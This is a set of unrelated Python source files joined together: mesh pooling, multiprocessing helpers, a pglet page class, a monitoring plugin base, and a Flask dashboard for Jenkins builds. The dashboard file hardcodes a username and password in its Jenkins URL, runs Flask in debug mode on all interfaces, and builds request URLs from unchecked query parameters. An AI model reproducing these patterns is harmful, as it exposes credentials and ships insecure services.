fix_mesh_hood_order(mesh, already_built_edges_hood)
# fix sides
fix_mesh_sides(mesh, already_built_edges_hood)
# merge vertex v with vertex u
mesh.merge_vertices(u, v)
return
def pool_mesh_operations(self, mesh, mask, edge_groups):
"""
        This function implements the mesh cleaning process. In order to keep
        the mesh connectivity valid and free of edge-neighborhood ambiguities,
        we keep the mesh clear of "doublet" and "singlet" (TBD) edges.
"""
# clear doublets and build new hood
doublet_cleared = self.pool_doublets(mesh, mask, edge_groups)
while doublet_cleared:
doublet_cleared = self.pool_doublets(mesh, mask, edge_groups)
# TBD
# clear singlets and build new hood
# clear_singlets(mesh, mask, edge_groups)
return
def pool_doublets(self, mesh, mask, edge_groups, vertices=None):
"""
This function finds doublet configuration and removes it from the mesh.
Args:
mesh (Mesh): mesh structure
            mask (ndarray): array of booleans which indicates which edges were removed
            edge_groups (MeshUnion): mesh union structure containing all edge
                                     groups of edge feature combinations.
vertices (list, optional): if not None, check only this list of
vertices in the mesh.
Otherwise - check all mesh.
Returns:
boolean - True if doublet found and removed.
False - otherwise.
"""
doublet_vertices, doublet_pairs_edges = find_doublets(mesh, vertices)
if len(doublet_vertices) == 0:
return False
for pair in doublet_pairs_edges:
doubelt_to_replaced_edge, doubelt_to_replaced_edge_other_side = \
clear_doublet_pair(mesh, mask, pair)
# union groups for features
for key in doubelt_to_replaced_edge.keys():
MeshPool.__union_groups(mesh, edge_groups, key,
doubelt_to_replaced_edge[key])
# union groups for features
for key in doubelt_to_replaced_edge_other_side.keys():
MeshPool.__union_groups(mesh, edge_groups, key,
doubelt_to_replaced_edge_other_side[
key])
for e in pair:
MeshPool.__remove_group(mesh, edge_groups, e)
return True
@staticmethod
def remove_edge(mesh, e, edge_groups, mask):
"""
Removes an edge:
Remove it from edge groups (MeshUnion structure)
Indicate it in the "mask" array
Remove it from the mesh structure.
"""
MeshPool.__remove_group(mesh, edge_groups, e)
mask[e] = False
mesh.remove_edge(e)
mesh.edges[e] = [-1, -1]
mesh.edges_count -= 1
mesh.gemm_edges[e] = [-1, -1, -1, -1, -1, -1]
def __clean_side(self, mesh, edge_id, side):
"""
        Checks how many items each pair of neighborhood edges of edge_id
        (on a specific side) share in their neighborhoods.
"""
if mesh.edges_count <= self.__out_target:
return False
info = MeshPool.__get_face_info(mesh, edge_id, side)
key_a, key_b, key_c, side_a, side_b, side_c, \
other_side_a, other_side_b, other_side_c, \
other_keys_a, other_keys_b, other_keys_c = info
shared_items_ab = MeshPool.__get_shared_items(other_keys_a,
other_keys_b)
shared_items_ac = MeshPool.__get_shared_items(other_keys_a,
other_keys_c)
shared_items_bc = MeshPool.__get_shared_items(other_keys_b,
other_keys_c)
if len(shared_items_ab) <= 2 and len(shared_items_ac) <= 2 and \
len(shared_items_bc) <= 2:
return True
else:
            assert False  # TODO: we shouldn't get here.
return False
@staticmethod
def has_boundaries(mesh, edge_id):
for edge in mesh.gemm_edges[edge_id]:
if edge == -1 or -1 in mesh.gemm_edges[edge]:
return True
return False
@staticmethod
def __get_v_n(mesh, edge_id):
return set(mesh.edges[mesh.ve[mesh.edges[edge_id, 0]]].reshape(-1)), \
set(mesh.edges[mesh.ve[mesh.edges[edge_id, 1]]].reshape(-1)),
def __is_one_ring_valid(self, mesh, edge_id):
"""
        Checks that the one-ring edge neighborhood of edge_id is valid, i.e.
        exactly 4 vertices are shared between the two sides of edge_id.
"""
e_a = mesh.ve[mesh.edges[edge_id, 0]]
e_b = mesh.ve[mesh.edges[edge_id, 1]]
v_a = set() # set of all neighbor + diagonal vertices of first edge vertex
v_b = set() # set of all neighbor + diagonal vertices of second edge vertex
for e in e_a:
if not e == edge_id:
v_aa, v_ab = self.__get_v_n(mesh, e)
v_a = set.union(set.union(v_aa, v_ab), v_a)
for e in e_b:
if not e == edge_id:
v_ba, v_bb = self.__get_v_n(mesh, e)
v_b = set.union(set.union(v_ba, v_bb), v_b)
shared = v_a & v_b - set(mesh.edges[edge_id])
return len(shared) == 4
@staticmethod
def __get_shared_items(list_a, list_b):
shared_items = []
for i in range(len(list_a)):
for j in range(len(list_b)):
if list_a[i] == list_b[j]:
shared_items.extend([i, j])
return shared_items
@staticmethod
def __get_face_info(mesh, edge_id, side):
key_a = mesh.gemm_edges[edge_id, side]
key_b = mesh.gemm_edges[edge_id, side + 1]
key_c = mesh.gemm_edges[edge_id, side + 2]
side_a = mesh.sides[edge_id, side]
side_b = mesh.sides[edge_id, side + 1]
side_c = mesh.sides[edge_id, side + 2]
other_side_a = (side_a - (side_a % 3) + 3) % 6
other_side_b = (side_b - (side_b % 3) + 3) % 6
other_side_c = (side_c - (side_c % 3) + 3) % 6
other_keys_a = [mesh.gemm_edges[key_a, other_side_a],
mesh.gemm_edges[key_a, other_side_a + 1],
mesh.gemm_edges[key_a, other_side_a + 2]]
other_keys_b = [mesh.gemm_edges[key_b, other_side_b],
mesh.gemm_edges[key_b, other_side_b + 1],
mesh.gemm_edges[key_b, other_side_b + 2]]
other_keys_c = [mesh.gemm_edges[key_c, other_side_c],
mesh.gemm_edges[key_c, other_side_c + 1],
mesh.gemm_edges[key_c, other_side_c + 2]]
return key_a, key_b, key_c, side_a, side_b, side_c, \
other_side_a, other_side_b, other_side_c, \
other_keys_a, other_keys_b, other_keys_c
@staticmethod
def __build_queue(features, edges_count):
# delete edges with smallest norm
squared_magnitude = torch.sum(features * features, 0)
if squared_magnitude.shape[-1] != 1:
squared_magnitude = squared_magnitude.unsqueeze(-1)
edge_ids = torch.arange(edges_count, device=squared_magnitude.device,
dtype=torch.float32).unsqueeze(-1)
heap = torch.cat((squared_magnitude, edge_ids), dim=-1).tolist()
heapify(heap)
return heap
@staticmethod
def __union_groups(mesh, edge_groups, source, target):
edge_groups.union(source, target)
mesh.union_groups(source, target)
@staticmethod
def __union_groups_at_once(mesh, edge_groups, targets_to_sources_dict):
edge_groups.union_groups(targets_to_sources_dict)
for target in targets_to_sources_dict.keys():
for source in targets_to_sources_dict[target]:
if target is not source:
mesh.union_groups(source, target)
@staticmethod
def __remove_group(mesh, edge_groups, index):
edge_groups.remove_group(index)
mesh.remove_group(index)
|
pushService.py
|
#!/usr/bin/python
from multiprocessing import Process, Queue
from pushSocket import pushSocket
from pushWork import pushWork
queue = Queue()
socket_proc = Process(target=pushSocket, args=(queue,))
work_proc = Process(target=pushWork, args=(queue,))
socket_proc.start()
work_proc.start()
|
mamajenkins.py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import json
import threading
import requests
import datetime
import socket
from collections import defaultdict
from init import app
from flask import render_template, request
JENKINS_URL = 'http://wenxianguo:ZXwxg6235269@jenkins.corp.mama.cn/jenkins'
PROJECT = [
# 18 环境
'post.api.mama.cn',
'qzone.mamaquan.mama.cn_18environment',
'mapi.mama.cn_18environment',
'admin.qzone.mamaquan.mama.cn_18environment',
'q.mama.cn_18environment',
'wap.mama.cn_18environment',
'reader.api.mama.cn_18environment',
'reader.mama.cn_18environment',
'storage.mamaquan.mama.cn_18environment',
'member_reply.mama.cn_18environment',
'feed.api.mama.cn_18environment',
'expert.mama.cn_18environment',
]
PROJECT_55 = [
# 55 环境
'post.api.mama.cn',
'qzone.mamaquan.mama.cn',
'mapi.mama.cn',
'admin.qzone.mamaquan.mama.cn',
'q.mama.cn',
'wap.mama.cn',
'reader.api.mama.cn',
'reader.mama.cn',
'storage.mamaquan.mama.cn',
'member_reply.mama.cn',
'feed.api.mama.cn',
'expert.mama.cn',
'live.mama.cn',
]
CONTENT = []
def show_builds(project=''):
url = '/job/%s/api/json' % project
    response = requests.post(JENKINS_URL + url)
    result = response.json()
    last_build_num = result['lastBuild']['number']
    url = "/job/%s/%s/api/json" % (project, last_build_num)
    response = requests.post(JENKINS_URL + url)
    result = response.json()
last_build_username = result['actions'][1]['causes'][0]['userName']
last_build_dateline = str(datetime.datetime.fromtimestamp(int(result['timestamp'] / 1000)))
last_build_branch = result['actions'][0]['parameters'][0]['value']
content = {
'project': project,
'dateline': last_build_dateline,
'username': last_build_username,
'number': last_build_num,
'branch': last_build_branch
}
return CONTENT.append(content)
@app.route('/')
def index():
env = request.args.get('env', '18')
return render_template('jenkins/jenkins.html', env=env)
@app.route('/get_last_builds', methods=['GET'])
def get_last_builds():
try:
global CONTENT
env = request.args.get('env', '18')
projects = PROJECT if env == '18' else PROJECT_55
CONTENT = []
jobs = []
for project in projects:
job = threading.Thread(target=show_builds, args=(project,))
job.setDaemon(True)
job.start()
jobs.append(job)
for job in jobs:
job.join()
return json.dumps(CONTENT)
except Exception as e:
return str(e)
@app.route('/yoda_listen')
def yoda_listen():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(('192.168.55.120', 4730))
s.sendall(b'workers\n')
data = s.recv(2048)
s.close()
data = data.decode('utf-8').rstrip('\n.').split('\n')
occupying = defaultdict(list)
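    # A gearman "workers" response row is assumed to look like (hedged example):
    #   "30 192.168.55.10 - : yoda_tlq_callback yoda_mmq_callback"
    # i.e. fd, client ip, client id, a ':' separator, then registered functions;
    # rows for workers with no registered functions end with the bare ':'.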
for row in data:
if row.endswith(':'):
number, ip, _, _ = row.split(maxsplit=4)
projects = []
else:
number, ip, _, _, projects = row.split(maxsplit=4)
projects = projects.split()
for project in projects:
if project in ['yoda_tlq_callback', 'yoda_mmq_callback']:
occupying[project].append(ip)
return render_template('jenkins/yoda_listen.html', occupying=occupying)
@app.route('/get_last_build_console', methods=['GET'])
def get_last_build_console():
project = request.args.get('project', '')
number = request.args.get('number', '')
    response = requests.get(JENKINS_URL + '/job/%s/%s/consoleText' % (project, number))
print(JENKINS_URL + '/job/%s/%s/consoleText' % (project, number))
return response.content
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
|
parallel.py
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/03a_parallel.ipynb (unless otherwise specified).
__all__ = ['threaded', 'startthread', 'set_num_threads', 'ThreadPoolExecutor', 'ProcessPoolExecutor', 'parallel',
'run_procs', 'parallel_gen']
# Cell
from .imports import *
from .foundation import *
from .basics import *
from .xtras import *
from functools import wraps
# from contextlib import contextmanager,ExitStack
from multiprocessing import Process, Queue
import concurrent.futures,time
from multiprocessing import Manager
from threading import Thread
# Cell
def threaded(f):
"Run `f` in a thread, and returns the thread"
@wraps(f)
def _f(*args, **kwargs):
res = Thread(target=f, args=args, kwargs=kwargs)
res.start()
return res
return _f
# Cell
def startthread(f):
"Like `threaded`, but start thread immediately"
threaded(f)()
# Cell
def set_num_threads(nt):
"Get numpy (and others) to use `nt` threads"
try: import mkl; mkl.set_num_threads(nt)
except: pass
try: import torch; torch.set_num_threads(nt)
except: pass
os.environ['IPC_ENABLE']='1'
for o in ['OPENBLAS_NUM_THREADS','NUMEXPR_NUM_THREADS','OMP_NUM_THREADS','MKL_NUM_THREADS']:
os.environ[o] = str(nt)
# Cell
def _call(lock, pause, n, g, item):
l = False
if pause:
try:
l = lock.acquire(timeout=pause*(n+2))
time.sleep(pause)
finally:
if l: lock.release()
return g(item)
# Cell
class ThreadPoolExecutor(concurrent.futures.ThreadPoolExecutor):
"Same as Python's ThreadPoolExecutor, except can pass `max_workers==0` for serial execution"
def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
if max_workers is None: max_workers=defaults.cpus
store_attr()
self.not_parallel = max_workers==0
if self.not_parallel: max_workers=1
super().__init__(max_workers, **kwargs)
def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
self.lock = Manager().Lock()
g = partial(f, *args, **kwargs)
if self.not_parallel: return map(g, items)
_g = partial(_call, self.lock, self.pause, self.max_workers, g)
try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
except Exception as e: self.on_exc(e)
# Cell
class ProcessPoolExecutor(concurrent.futures.ProcessPoolExecutor):
"Same as Python's ProcessPoolExecutor, except can pass `max_workers==0` for serial execution"
def __init__(self, max_workers=defaults.cpus, on_exc=print, pause=0, **kwargs):
if max_workers is None: max_workers=defaults.cpus
store_attr()
self.not_parallel = max_workers==0
if self.not_parallel: max_workers=1
super().__init__(max_workers, **kwargs)
def map(self, f, items, *args, timeout=None, chunksize=1, **kwargs):
self.lock = Manager().Lock()
g = partial(f, *args, **kwargs)
if self.not_parallel: return map(g, items)
_g = partial(_call, self.lock, self.pause, self.max_workers, g)
try: return super().map(_g, items, timeout=timeout, chunksize=chunksize)
except Exception as e: self.on_exc(e)
# Cell
try: from fastprogress import progress_bar
except: progress_bar = None
# Cell
def parallel(f, items, *args, n_workers=defaults.cpus, total=None, progress=None, pause=0,
threadpool=False, timeout=None, chunksize=1, **kwargs):
"Applies `func` in parallel to `items`, using `n_workers`"
if progress is None: progress = progress_bar is not None
pool = ThreadPoolExecutor if threadpool else ProcessPoolExecutor
with pool(n_workers, pause=pause) as ex:
r = ex.map(f,items, *args, timeout=timeout, chunksize=chunksize, **kwargs)
if progress:
if total is None: total = len(items)
r = progress_bar(r, total=total, leave=False)
return L(r)
# Cell
def run_procs(f, f_done, args):
"Call `f` for each item in `args` in parallel, yielding `f_done`"
processes = L(args).map(Process, args=arg0, target=f)
for o in processes: o.start()
yield from f_done()
processes.map(Self.join())
# Cell
def _f_pg(obj, queue, batch, start_idx):
for i,b in enumerate(obj(batch)): queue.put((start_idx+i,b))
def _done_pg(queue, items): return (queue.get() for _ in items)
# Cell
def parallel_gen(cls, items, n_workers=defaults.cpus, **kwargs):
"Instantiate `cls` in `n_workers` procs & call each on a subset of `items` in parallel."
if n_workers==0:
yield from enumerate(list(cls(**kwargs)(items)))
return
batches = L(chunked(items, n_chunks=n_workers))
idx = L(itertools.accumulate(0 + batches.map(len)))
queue = Queue()
if progress_bar: items = progress_bar(items, leave=False)
f=partial(_f_pg, cls(**kwargs), queue)
done=partial(_done_pg, queue, items)
yield from run_procs(f, done, L(batches,idx).zip())
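# Cell
# Hedged usage sketch (not part of the original notebook export): `double` must
# be a picklable module-level function because the default executor is
# process-based; pass `threadpool=True` to use a thread pool instead.
#
#   def double(x): return x * 2
#   parallel(double, range(8), n_workers=2, progress=False)
#   # -> (#8) [0,2,4,6,8,10,12,14]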
|
termhandler.py
|
__author__ = 'jbjohnso'
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2014 Lenovo Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#This file is responsible for a client-side communication method to enable
#capabilities like measuring and rearranging the terminal window for
#wcons
import atexit
import os
import socket
import stat
import threading
class TermHandler(object):
def __init__(self, path):
self.path = path
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
os.remove(path)
except OSError: # if file does not exist, no big deal
pass
atexit.register(self.shutdown)
self.socket.bind(path)
os.chmod(path, stat.S_IWUSR | stat.S_IRUSR)
th = threading.Thread(target=self.sockinteract)
th.daemon = True
th.start()
def shutdown(self):
try:
os.remove(self.path)
except OSError:
pass
def sockinteract(self):
self.socket.listen(5)
while True:
connection = None
try:
connection, address = self.socket.accept()
connection.sendall("confetty control v1--\n")
cmd = connection.recv(8)
if 'GETWINID' == cmd:
connection.sendall(os.environ['WINDOWID'])
connection.close()
except BaseException:
pass
finally:
if connection is not None:
connection.close()
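
def _example_query_winid(path):
    # Hedged client sketch (not part of the original module): connects to the
    # control socket created by TermHandler above and asks for the X window id.
    # Like the handler, it assumes Python 2 string/bytes semantics.
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client.connect(path)
    client.recv(64)  # discard the "confetty control v1--" banner
    client.sendall('GETWINID')
    winid = client.recv(32)
    client.close()
    return winid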
|
page.py
|
import json
import logging
import threading
from typing import List, Optional
from beartype import beartype
from pglet import constants
from pglet.connection import Connection
from pglet.control import Control
from pglet.control_event import ControlEvent
from pglet.protocol import Command
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal
Align = Literal[
None,
"start",
"end",
"center",
"space-between",
"space-around",
"space-evenly",
"baseline",
"stretch",
]
THEME = Literal[None, "light", "dark"]
class Page(Control):
def __init__(self, conn: Connection, session_id):
Control.__init__(self, id="page")
self._conn = conn
self._session_id = session_id
self._controls = [] # page controls
self._index = {} # index with all page controls
self._index[self.id] = self
self._last_event = None
self._event_available = threading.Event()
self._fetch_page_details()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def get_control(self, id):
return self._index.get(id)
def _get_children(self):
return self._controls
def _fetch_page_details(self):
values = self._conn.send_commands(
self._conn.page_name,
self._session_id,
[
Command(0, "get", ["page", "hash"], None, None, None),
Command(0, "get", ["page", "winwidth"], None, None, None),
Command(0, "get", ["page", "winheight"], None, None, None),
Command(0, "get", ["page", "userauthprovider"], None, None, None),
Command(0, "get", ["page", "userid"], None, None, None),
Command(0, "get", ["page", "userlogin"], None, None, None),
Command(0, "get", ["page", "username"], None, None, None),
Command(0, "get", ["page", "useremail"], None, None, None),
Command(0, "get", ["page", "userclientip"], None, None, None),
],
).results
self._set_attr("hash", values[0], False)
self._set_attr("winwidth", values[1], False)
self._set_attr("winheight", values[2], False)
self._set_attr("userauthprovider", values[3], False)
self._set_attr("userid", values[4], False)
self._set_attr("userlogin", values[5], False)
self._set_attr("username", values[6], False)
self._set_attr("useremail", values[7], False)
self._set_attr("userclientip", values[8], False)
def update(self, *controls):
with self._lock:
if len(controls) == 0:
return self.__update(self)
else:
return self.__update(*controls)
def __update(self, *controls):
added_controls = []
commands = []
# build commands
for control in controls:
control.build_update_commands(self._index, added_controls, commands)
if len(commands) == 0:
return
# execute commands
results = self._conn.send_commands(
self._conn.page_name, self._session_id, commands
).results
if len(results) > 0:
n = 0
for line in results:
for id in line.split(" "):
added_controls[n]._Control__uid = id
added_controls[n].page = self
# add to index
self._index[id] = added_controls[n]
n += 1
def add(self, *controls):
with self._lock:
self._controls.extend(controls)
return self.__update(self)
def insert(self, at, *controls):
with self._lock:
n = at
for control in controls:
self._controls.insert(n, control)
n += 1
return self.__update(self)
def remove(self, *controls):
with self._lock:
for control in controls:
self._controls.remove(control)
return self.__update(self)
def remove_at(self, index):
with self._lock:
self._controls.pop(index)
return self.__update(self)
def clean(self):
with self._lock:
self._previous_children.clear()
for child in self._get_children():
self._remove_control_recursively(self._index, child)
self._controls.clear()
return self._send_command("clean", [self.uid])
def error(self, message=""):
with self._lock:
self._send_command("error", [message])
def on_event(self, e):
logging.info(f"page.on_event: {e.target} {e.name} {e.data}")
with self._lock:
if e.target == "page" and e.name == "change":
for props in json.loads(e.data):
id = props["i"]
if id in self._index:
for name in props:
if name != "i":
self._index[id]._set_attr(
name, props[name], dirty=False
)
elif e.target in self._index:
self._last_event = ControlEvent(
e.target, e.name, e.data, self._index[e.target], self
)
handler = self._index[e.target].event_handlers.get(e.name)
if handler:
t = threading.Thread(
target=handler, args=(self._last_event,), daemon=True
)
t.start()
self._event_available.set()
def wait_event(self):
self._event_available.clear()
self._event_available.wait()
return self._last_event
def show_signin(self, auth_providers="*", auth_groups=False, allow_dismiss=False):
with self._lock:
self.signin = auth_providers
self.signin_groups = auth_groups
self.signin_allow_dismiss = allow_dismiss
self.__update(self)
while True:
e = self.wait_event()
if e.control == self and e.name.lower() == "signin":
return True
elif e.control == self and e.name.lower() == "dismisssignin":
return False
def signout(self):
return self._send_command("signout", None)
def can_access(self, users_and_groups):
return (
self._send_command("canAccess", [users_and_groups]).result.lower() == "true"
)
def close(self):
if self._session_id == constants.ZERO_SESSION:
self._conn.close()
def _send_command(self, name: str, values: List[str]):
return self._conn.send_command(
self._conn.page_name,
self._session_id,
Command(0, name, values, None, None, None),
)
# url
@property
def url(self):
return self._conn.page_url
# name
@property
def name(self):
return self._conn.page_name
# connection
@property
def connection(self):
return self._conn
# index
@property
def index(self):
return self._index
# session_id
@property
def session_id(self):
return self._session_id
# controls
@property
def controls(self):
return self._controls
@controls.setter
def controls(self, value):
self._controls = value
# title
@property
def title(self):
return self._get_attr("title")
@title.setter
def title(self, value):
self._set_attr("title", value)
# vertical_fill
@property
def vertical_fill(self):
return self._get_attr("verticalFill", data_type="bool", def_value=False)
@vertical_fill.setter
@beartype
def vertical_fill(self, value: Optional[bool]):
self._set_attr("verticalFill", value)
# horizontal_align
@property
def horizontal_align(self):
return self._get_attr("horizontalAlign")
@horizontal_align.setter
@beartype
def horizontal_align(self, value: Align):
self._set_attr("horizontalAlign", value)
# vertical_align
@property
def vertical_align(self):
return self._get_attr("verticalAlign")
@vertical_align.setter
@beartype
def vertical_align(self, value: Align):
self._set_attr("verticalAlign", value)
# gap
@property
def gap(self):
return self._get_attr("gap")
@gap.setter
@beartype
def gap(self, value: Optional[int]):
self._set_attr("gap", value)
# padding
@property
def padding(self):
return self._get_attr("padding")
@padding.setter
def padding(self, value):
self._set_attr("padding", value)
# bgcolor
@property
def bgcolor(self):
return self._get_attr("bgcolor")
@bgcolor.setter
def bgcolor(self, value):
self._set_attr("bgcolor", value)
# theme
@property
def theme(self):
return self._get_attr("theme")
@theme.setter
@beartype
def theme(self, value: THEME):
self._set_attr("theme", value)
# theme_primary_color
@property
def theme_primary_color(self):
return self._get_attr("themePrimaryColor")
@theme_primary_color.setter
def theme_primary_color(self, value):
self._set_attr("themePrimaryColor", value)
# theme_text_color
@property
def theme_text_color(self):
return self._get_attr("themeTextColor")
@theme_text_color.setter
def theme_text_color(self, value):
self._set_attr("themeTextColor", value)
# theme_background_color
@property
def theme_background_color(self):
return self._get_attr("themeBackgroundColor")
@theme_background_color.setter
def theme_background_color(self, value):
self._set_attr("themeBackgroundColor", value)
# hash
@property
def hash(self):
return self._get_attr("hash")
@hash.setter
def hash(self, value):
self._set_attr("hash", value)
# win_width
@property
def win_width(self):
w = self._get_attr("winwidth")
if w != None and w != "":
return int(w)
return 0
# win_height
@property
def win_height(self):
h = self._get_attr("winheight")
if h != None and h != "":
return int(h)
return 0
# signin
@property
def signin(self):
return self._get_attr("signin")
@signin.setter
def signin(self, value):
self._set_attr("signin", value)
# signin_allow_dismiss
@property
def signin_allow_dismiss(self):
return self._get_attr("signinAllowDismiss", data_type="bool", def_value=False)
@signin_allow_dismiss.setter
@beartype
def signin_allow_dismiss(self, value: Optional[bool]):
self._set_attr("signinAllowDismiss", value)
# signin_groups
@property
def signin_groups(self):
return self._get_attr("signinGroups", data_type="bool", def_value=False)
@signin_groups.setter
@beartype
def signin_groups(self, value: Optional[bool]):
self._set_attr("signinGroups", value)
# user_auth_provider
@property
def user_auth_provider(self):
return self._get_attr("userauthprovider")
# user_id
@property
def user_id(self):
return self._get_attr("userId")
# user_login
@property
def user_login(self):
return self._get_attr("userLogin")
# user_name
@property
def user_name(self):
return self._get_attr("userName")
# user_email
@property
def user_email(self):
return self._get_attr("userEmail")
# user_client_ip
@property
def user_client_ip(self):
return self._get_attr("userClientIP")
# on_signin
@property
def on_signin(self):
return self._get_event_handler("signin")
@on_signin.setter
def on_signin(self, handler):
self._add_event_handler("signin", handler)
# on_dismiss_signin
@property
def on_dismiss_signin(self):
return self._get_event_handler("dismissSignin")
@on_dismiss_signin.setter
def on_dismiss_signin(self, handler):
self._add_event_handler("dismissSignin", handler)
# on_signout
@property
def on_signout(self):
return self._get_event_handler("signout")
@on_signout.setter
def on_signout(self, handler):
self._add_event_handler("signout", handler)
# on_close
@property
def on_close(self):
return self._get_event_handler("close")
@on_close.setter
def on_close(self, handler):
self._add_event_handler("close", handler)
# on_hash_change
@property
def on_hash_change(self):
return self._get_event_handler("hashChange")
@on_hash_change.setter
def on_hash_change(self, handler):
self._add_event_handler("hashChange", handler)
# on_resize
@property
def on_resize(self):
return self._get_event_handler("resize")
@on_resize.setter
def on_resize(self, handler):
self._add_event_handler("resize", handler)
# on_connect
@property
def on_connect(self):
return self._get_event_handler("connect")
@on_connect.setter
def on_connect(self, handler):
self._add_event_handler("connect", handler)
# on_disconnect
@property
def on_disconnect(self):
return self._get_event_handler("disconnect")
@on_disconnect.setter
def on_disconnect(self, handler):
self._add_event_handler("disconnect", handler)
|
plugin.py
|
# -*- coding: utf-8 -*-
import time
import logging
import traceback
import sys
import json
from threading import Thread
from mamonsu.lib.const import Template
class PluginDisableException(Exception):
pass
class Plugin(object):
# can be 'mamonsu' or 'agent'
# type depends on run command
Type = 'mamonsu'
# --plugin-type for zabbix-agent can be: all,postgres,sys
AgentPluginType = 'all'
# PG version
VersionPG = '10'
# Macros for run as agent type or as mamonsu
Macros = {"mamonsu": "", "agent": "{$PG_CONNINFO},{$PG_PATH}"}
# plugin interval run
Interval = 60
# plugin config
    DEFAULT_CONFIG = {}  # type: dict
_thread = None # type: Thread
_sender = False
_enabled = True
    # for all child classes
is_child = True
# old_zabbix_server_version
old_zabbix = False
# const
PATH = "/etc/zabbix/zabbix_agentd.d/scripts"
DELTA = Template.DELTA
GRAPH_TYPE = Template.GRAPH_TYPE
VALUE_TYPE = Template.VALUE_TYPE
UNITS = Template.UNITS
TYPE = Template.TYPE
DELTA_SPEED = Template.DELTA.speed_per_second
DELTA_CHANGE = Template.DELTA.simple_change
def __init__(self, config):
self.config = config
self.log = logging.getLogger(
self.__class__.__name__.upper())
self.sender = None
self.last_error_text = ''
# from config => _plugin_config
self._plugin_config = {}
name = self.__class__.__name__.lower()
if self.config.has_plugin_config(name):
for x in self.config.plugin_options(name):
self._plugin_config[x] = self.config.fetch(name, x)
@classmethod
def only_child_subclasses(self):
plugins = []
for klass in self.__subclasses__():
if klass.is_child:
plugins.append(klass)
plugins.extend(klass.only_child_subclasses())
return plugins
@classmethod
def set_default_config(cls, config, interval):
name = cls.__name__.lower()
# if section already loaded via config file
# if not config.has_section(name) and len(cls.DEFAULT_CONFIG) > 0:
if not config.has_section(name):
config.add_section(name)
for x in cls.DEFAULT_CONFIG:
if config.has_option(name, x):
continue
value = cls.DEFAULT_CONFIG[x]
if not isinstance(value, str):
sys.stderr.write(
'Config value {0} in section {1} must'
' be string! Fix plugin please.\n'.format(x, name))
config.set(name, x, '{0}'.format(cls.DEFAULT_CONFIG[x]))
if not config.has_option(name, 'interval') and interval is not None:
config.set(name, 'interval', '{0}'.format(interval))
# get value from config
def plugin_config(self, name, as_json=False):
if name not in self._plugin_config:
return None
if as_json:
return json.loads(self._plugin_config[name])
else:
return self._plugin_config[name]
def start(self):
self._thread = Thread(target=self._loop)
self._thread.daemon = True
self._thread.start()
self.log.info('started ...')
def is_alive(self):
if self._thread is not None:
return self._thread.is_alive()
return False
def run(self, sender):
return None
def is_sender(self):
return self._sender
def get_boolean(self, value):
if value:
if value.upper() in ('FALSE', '0', 'NO', 'F'):
return False
return True
def is_enabled(self):
if self.plugin_config('enabled'):
return self.get_boolean(self.plugin_config('enabled'))
return self._enabled
def disable(self):
self._plugin_config['enabled'] = 'False'
self._enabled = False
def set_sender(self, sender):
self.sender = sender
def items(self, template, dashboard=False):
return None
def graphs(self, template, dashboard=False):
return None
def triggers(self, template, dashboard=False):
return None
def discovery_rules(self, template, dashboard=False):
return None
def keys_and_queries(self, template_zabbix):
return None
def _log_exception(self, e, trace):
self.last_error_text = 'catch error: {0}'.format(e)
self.log.error(self.last_error_text)
self.log.info('hint: enable debug level to full exception trace')
self.log.debug(trace)
def _loop(self):
while True:
last_start = time.time()
try:
self.run(self.sender)
except PluginDisableException as e:
text = 'disable plugin: {0}.'.format(e)
self.log.info(text)
return
except Exception as e:
trace = traceback.format_exc()
# unpack_from error can happen if pg8000 was waiting for the response
# from PostgreSQL on the socket but instead got nothing.
# This error happens either due to an unstable network or if
# PostgreSQL fails to send the results for the last queries while restarting
if "unpack_from requires a buffer" not in trace:
self._log_exception(e, trace)
return
            # time interval between sending metrics
sleep_time = int(self.plugin_config('interval')) - int(time.time() - last_start)
if sleep_time > 0:
time.sleep(sleep_time)
else:
self.log.error(
'Timeout: {0}s'.format(int(time.time() - last_start)))
return
# convert zabbix key to right type: zabbix-trapper or zabbix-agent
def right_type(self, key, var="", var_discovery=""):
if self.Type == "mamonsu":
if len(var_discovery) == 0:
new_key = key.format('[{0}]'.format(var))
else:
new_key = key.format('[{0}{1}]'.format(var, var_discovery[:-1]))
else:
if self.AgentPluginType == 'sys':
if var_discovery != "":
if var == "":
new_key = key.format('{0}[{1}]'.format(var, var_discovery))
else:
new_key = key.format('.{0}[{1}]'.format(var, var_discovery))
else:
if var != "":
new_key = key.format('.{0}'.format(var))
else:
new_key = key.format('')
else:
if var == "":
new_key = key.format('{0}[{1}]'.format(var, var_discovery + self.Macros[self.Type]))
else:
new_key = key.format('.{0}[{1}]'.format(var, var_discovery + self.Macros[self.Type]))
return new_key
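
# Hedged examples (not part of the original module) of right_type() output for
# the default Type == 'mamonsu'; the key names are hypothetical:
#   self.right_type('pgsql.connections{0}', 'total')
#       -> 'pgsql.connections[total]'
#   self.right_type('pgsql.database.size{0}', var_discovery='{#DATABASE},')
#       -> 'pgsql.database.size[{#DATABASE}]'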
|
trainer_controller.py
|
# # Unity ML-Agents Toolkit
# ## ML-Agent Learning
"""Launches trainers for each External Brains in a Unity Environment."""
import os
import threading
from typing import Dict, Set, List
from collections import defaultdict
import numpy as np
from mlagents.tf_utils import tf
from mlagents_envs.logging_util import get_logger
from mlagents.trainers.env_manager import EnvManager, EnvironmentStep
from mlagents_envs.exception import (
UnityEnvironmentException,
UnityCommunicationException,
UnityCommunicatorStoppedException,
)
from mlagents_envs.timers import (
hierarchical_timer,
timed,
get_timer_stack_for_thread,
merge_gauges,
)
from mlagents.trainers.trainer import Trainer
from mlagents.trainers.environment_parameter_manager import EnvironmentParameterManager
